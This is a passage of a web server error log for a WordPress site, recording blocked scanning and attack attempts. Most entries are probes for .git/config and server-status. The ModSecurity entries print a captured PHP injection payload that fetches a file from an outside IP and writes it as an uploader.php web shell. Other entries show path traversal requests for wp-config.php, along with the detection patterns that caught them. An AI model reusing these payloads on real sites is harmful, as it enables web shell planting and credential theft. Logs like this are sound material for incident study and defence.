137.184.106.30:32938] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/15 14:50:16 [error] 31389#31389: *905572 access forbidden by rule, client: 137.184.106.30, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 15 15:04:32.369263 2023] [authz_core:error] [pid 31458:tid 140202337060608] [client 162.243.186.177:33812] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/15 15:04:35 [error] 31389#31389: *906195 access forbidden by rule, client: 162.243.186.177, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Aug 15 16:53:12.568761 2023] [autoindex:error] [pid 31658:tid 140202269918976] [client 20.231.72.103:40762] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 16 06:01:08.919833 2023] [authz_core:error] [pid 25573:tid 139945897273088] [client 178.62.73.12:58082] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/16 06:01:13 [error] 24806#24806: *943961 access forbidden by rule, client: 178.62.73.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Aug 16 06:18:38.359029 2023] [authz_core:error] [pid 25573:tid 139945981200128] [client 45.79.83.159:34446] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Aug 16 06:18:38.765841 2023] [authz_core:error] [pid 25573:tid 139946006378240] [client 165.227.146.2:34454] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/16 06:18:42 [error] 24806#24806: *946491 access forbidden by rule, client: 45.79.83.159, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/16 06:18:43 [error] 24805#24805: *946494 access forbidden by rule, client: 165.227.146.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Aug 16 06:56:50.129326 2023] [authz_core:error] [pid 25573:tid 139945972807424] [client 138.68.163.10:35840] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/16 06:56:54 [error] 24806#24806: *947426 access forbidden by rule, client: 138.68.163.10, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Aug 16 09:27:47.657306 2023] [:error] [pid 10366:tid 139946031556352] [client 34.68.141.124:50092] [client 34.68.141.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNzc483t3Czrg4vHkYBjDQAAAUc"], referer: www.google.com [Wed Aug 16 12:12:02.543038 2023] [:error] [pid 24848:tid 139946073519872] [client 15.235.160.194:58168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-signup.php, referer: www.google.com [Wed Aug 16 19:30:27.785446 2023] [autoindex:error] [pid 25573:tid 139945922451200] [client 40.77.49.41:48944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 16 22:31:30.302242 2023] [autoindex:error] [pid 10366:tid 139945939236608] [client 20.172.237.4:56944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 17 07:11:55.287593 2023] [authz_core:error] [pid 9916:tid 140134002321152] [client 144.126.198.24:56698] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/17 07:12:00 [error] 9874#9874: *1002156 access forbidden by rule, client: 144.126.198.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 17 07:37:38.281011 2023] [autoindex:error] [pid 9917:tid 140133886052096] [client 34.172.140.163:58138] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 17 07:45:02.672140 2023] [authz_core:error] [pid 9916:tid 140133852481280] [client 198.199.121.22:58638] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Thu Aug 17 07:45:05.889080 2023] [authz_core:error] [pid 10092:tid 140133793732352] [client 178.62.3.65:58652] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/17 07:45:06 [error] 9874#9874: *1003705 access forbidden by rule, client: 198.199.121.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 07:45:11 [error] 9874#9874: *1003724 access forbidden by rule, client: 178.62.3.65, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 17 08:24:21.230848 2023] [authz_core:error] [pid 10092:tid 140134010713856] [client 137.184.162.65:60914] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/17 08:24:25 [error] 9874#9874: *1005494 access forbidden by rule, client: 137.184.162.65, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 17 17:21:14.560973 2023] [autoindex:error] [pid 10092:tid 140133810517760] [client 20.57.136.83:58058] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 17 18:27:15.822813 2023] [autoindex:error] [pid 10092:tid 140133751768832] [client 40.77.49.41:60934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/17 19:08:38 [error] 9875#9875: *1028299 access forbidden by rule, client: 36.90.9.210, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 19:08:39 [error] 9875#9875: *1028300 access forbidden by rule, client: 36.90.9.210, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 17 19:56:12.167774 2023] [autoindex:error] [pid 9918:tid 140133844088576] [client 20.198.105.199:36736] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 17 20:49:01.519017 2023] [:error] [pid 9917:tid 140133894444800] [client 34.30.132.15:38920] [client 34.30.132.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZN7ODQVUn_HW3S0NpWb6uwAAAEY"], referer: www.google.com 2023/08/17 21:45:09 [error] 9875#9875: *1033342 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9874#9874: *1033343 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/admin/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9875#9875: *1033344 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /aomanalyzer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9874#9874: *1033345 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /a/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9874#9874: *1033347 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /__MACOSX/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9874#9874: *1033346 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9874#9874: *1033348 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /amphtml/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9875#9875: *1033349 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /alpha/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:09 [error] 9875#9875: *1033350 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033351 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/admin/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033352 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /staging/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033353 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033354 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /repository/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033356 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033355 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/user/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033413 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033414 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /content../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9875#9875: *1033415 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /assets../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033357 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033359 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033358 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /application/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033361 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033360 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/admin/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033362 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /flock/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033363 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/user/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033364 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033366 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033367 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033368 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /repos/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033365 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033370 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033371 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033372 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /user/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033369 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/admin/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033373 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033375 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033374 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /developer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033377 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033378 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /img../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033376 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /store/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033380 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033381 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033379 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /shop/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033382 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033384 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /lib../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033385 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /live/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033386 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033383 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033387 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/v3/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033388 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /media../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033389 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033390 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033392 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033391 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /demo/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033393 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /events../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033394 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033395 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033397 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/user/v4/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033398 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/user/v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033396 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /beta/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033399 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /api/v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033400 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /old-cuburn/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033401 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033402 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /qa/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033403 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033404 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /samples/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033405 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /images../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033406 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /build/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033408 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /wp-includes/js/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033409 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /new/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033407 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /gateway/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033410 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033411 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /m/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/17 21:45:10 [error] 9874#9874: *1033412 access forbidden by rule, client: 3.134.77.155, server: investigacionperu.com, request: "GET /css../.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 17 23:52:51.717827 2023] [:error] [pid 9916:tid 140133768554240] [client 194.233.90.248:47458] [client 194.233.90.248] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZN75I_nvs5laMAde4RByFQAAABU"] [Fri Aug 18 09:57:38.974891 2023] [authz_core:error] [pid 18874:tid 140103474366208] [client 139.144.150.23:52252] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/18 09:57:42 [error] 18832#18832: *1064212 access forbidden by rule, client: 139.144.150.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 18 10:40:02.471916 2023] [authz_core:error] [pid 18872:tid 140103309555456] [client 143.110.218.229:54652] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/18 10:40:06 [error] 18832#18832: *1065975 access forbidden by rule, client: 143.110.218.229, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 18 11:07:32.681271 2023] [authz_core:error] [pid 19445:tid 140103457580800] [client 128.199.195.68:56406] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/18 11:07:38 [error] 18833#18833: *1067240 access forbidden by rule, client: 128.199.195.68, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Aug 18 11:13:39.018365 2023] [authz_core:error] [pid 19445:tid 140103499544320] [client 45.79.116.95:56760] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/18 11:13:41 [error] 18832#18832: *1067515 access forbidden by rule, client: 45.79.116.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 18 12:54:08.426122 2023] [:error] [pid 19445:tid 140103292770048] [client 87.249.132.213:34862] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/down.php"] [unique_id "ZN-wQEWc94tsnIsHAQ-XMQAAANA"] [Fri Aug 18 12:54:08.521444 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:34864] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id 